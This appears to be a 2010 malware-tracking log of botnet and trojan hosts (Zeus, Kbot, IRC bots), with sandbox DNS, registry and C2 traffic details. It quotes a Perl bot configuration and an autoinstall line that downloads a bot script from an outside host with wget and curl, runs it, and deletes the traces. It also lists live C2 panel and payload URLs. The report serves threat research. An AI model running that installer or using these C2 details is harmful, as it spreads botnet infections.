Month: December 2010

videosalegria.com (malware hosted with Brazil Comite Gestor Da Internet No Brasil)

DNS Lookup
Host Name  IP Address
0  127.0.0.1
videosalegria.com  187.17.98.13
UDP Connections
Remote IP Address: 127.0.0.1 Port: 1066
Send Datagram: 115 packet(s) of size 1
Recv Datagram: 115 packet(s) of size 1
Download URLs
http://187.17.98.13/red.swf (videosalegria.com)
Outgoing connection to remote server: videosalegria.com TCP port 80
DNS Lookup
Host Name  IP Address
0  127.0.0.1
www.youtube.com

crocusfeerst.com (malware hosted with Netherlands Amsterdam Yisp)

DNS Lookup
Host Name  IP Address
crocusfeerst.com  109.235.48.186
Opened listening TCP connection on port: 21346
Outgoing connection to remote server: crocusfeerst.com TCP port 80
Outgoing connection to remote server: crocusfeerst.com TCP port 80
Registry Changes by all processes
Create or Open
Changes
HKEY_CURRENT_USER\Software\Microsoft\Tihit "Ohyti" = [REG_BINARY, size: 116 bytes]
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PhishingFilter "Enabled" = [REG_DWORD,

213.155.20.163 (Kbot HTTP bot hosted with Ukraine Tehnologii Budushego Llc)

Panel here: http://213.155.20.163/new/auth.php
DNS Lookup
Host Name  IP Address
213.155.20.163  213.155.20.163
Data posted to URLs
http://213.155.20.163/new/stat.php (213.155.20.163)
http://213.155.20.163/new/stat.php (213.155.20.163)
Outgoing connection to remote server: 213.155.20.163 TCP port 80
Outgoing connection to remote server: 213.155.20.163 TCP port 80
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\msupdate "ImagePath" = c:\windows\system32\mssrv32.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\msupdate "DisplayName" = Microsoft

irc.si.leet.la (linux bots hosted with Canada Iweb Dedicated Cl)

######################
my $server = "irc.si.leet.la","67.205.85.206";
my $port = "7000";
my $channel = "#mojok";
my $owner = "KaKuNg";
my $procname = "usr/sbin/php";
######################

autoinstall script:

################################################################
#!/usr/bin/perl
#
# Auto install script by SuWunk
#
# created: October 2010
#
################################################################
{
system("wget http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;lwp-download http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;curl -O http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;fetch http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;ftp http://tmp.ishaan.eu/home/e107_themes/vekna_bluez/ts.txt;perl ts.txt irc.si.leet.la 7000 mojok KaKuNg;rm -rf *.txt");

irc.123empe123.co.cc (botnet hosted with United States Missoula Sharktech Internet Services)

– DNS Queries:
Name  Query Type  Query Result  Successful  Protocol
irc.123empe123.co.cc  DNS_TYPE_A  64.32.29.221  YES  udp
64.32.29.221:6667
Nick: [AUT|00|P|90924]
Username: XP-0641
Server Pass: pass
Joined Channel: ##Galactic## with Password Anti-GaYs
Channel Topic for Channel ##Galactic##: "http://www.windowscenter.net/descargas/msn.exe"
Now talking in ##Galactic##
Topic On: [ ##Galactic## ] [ http://www.windowscenter.net/descargas/msn.exe ]
Topic By: [ RooTED[ON] ]
Modes On: [

all4corp.com (Zeus hosted with United States New York Bluemile Inc)

DNS Lookup
Host Name  IP Address
all4corp.com  76.10.214.62
www.google.com  74.125.39.99
Opened listening TCP connection on port: 29790
Download URLs
http://76.10.214.62/xed/config.bin (all4corp.com)
http://74.125.39.99/webhp (www.google.com)
http://76.10.214.62/xed/yourbot.exe (all4corp.com)
http://76.10.214.62/xed/yourbot.exe (all4corp.com)
http://76.10.214.62/xed/yourbot.exe (all4corp.com)
Data posted to URLs
http://76.10.214.62/xed/gate.php (all4corp.com)
Outgoing connection to remote server: all4corp.com TCP port 80
Outgoing connection to remote server: www.google.com TCP port 80
Outgoing

get.whitesmoke.com (Trojan Downloader hosted with United States Sunnyvale Qwest Communications Company Llc)

DNS Lookup
Host Name  IP Address
get.whitesmoke.com  63.236.35.30
c0004553.cdn2.cloudfiles.rackspacecloud.com  87.248.217.253
Download URLs
http://63.236.35.30/offerbox/OfferBoxSetup_FR.exe (get.whitesmoke.com)
http://63.236.35.30/WriterTools/WhiteSmokeWriter.exe (get.whitesmoke.com)
http://87.248.217.253/WhiteSmokeWriter.exe (c0004553.cdn2.cloudfiles.rackspacecloud.com)
Outgoing connection to remote server: get.whitesmoke.com TCP port 80
Outgoing connection to remote server: c0004553.cdn2.cloudfiles.rackspacecloud.com TCP port 80
DNS Lookup
Host Name  IP Address
download.bandoo.com  207.232.22.25
download.cdn.bandoo.com  212.201.100.171
Download URLs
http://207.232.22.25/o/0/r/63/Fun4IMV6.exe (download.bandoo.com)
http://212.201.100.171/cdn/o/0/r/63/Fun4IMV6.exe (download.cdn.bandoo.com)

205.234.223.186 (botnet hosted with United States Chicago Hostforweb Inc)

Remote Host  Port Number
205.234.223.186  1234
PASS xxx
216.178.38.224  80
216.178.39.11  80
64.208.241.27  80
69.63.189.39  80
NICK NEW-[USA|00|P|16686]
USER XP-2777 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|16686] -ix
JOIN #!nn! test
PONG 22
MOTD *
The data identified by the following URLs was then requested from the remote web server:
o http://browseusers.myspace.com/Browse/Browse.aspx
o http://www.myspace.com/browse/people
o http://www.myspace.com/help/browserunsupported

unknown.hostforweb.net (botnet hosted with United States Chicago Hostforweb Inc)

Remote Host  Port Number
216.178.38.224  80
63.135.80.46  80
96.17.164.187  80
216.246.77.76  2345
PASS xxx
NICK NEW-[USA|00|P|20068]
USER XP-7334 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|20068] -ix
JOIN #!gf! test
PONG 22
MOTD *
The data identified by the following URLs was then requested from the remote web server:
o http://browseusers.myspace.com/Browse/Browse.aspx
o http://www.myspace.com/browse/people
o http://www.myspace.com/help/browserunsupported
o http://x.myspacecdn.com/modules/splash/static/img/cornersSheet.png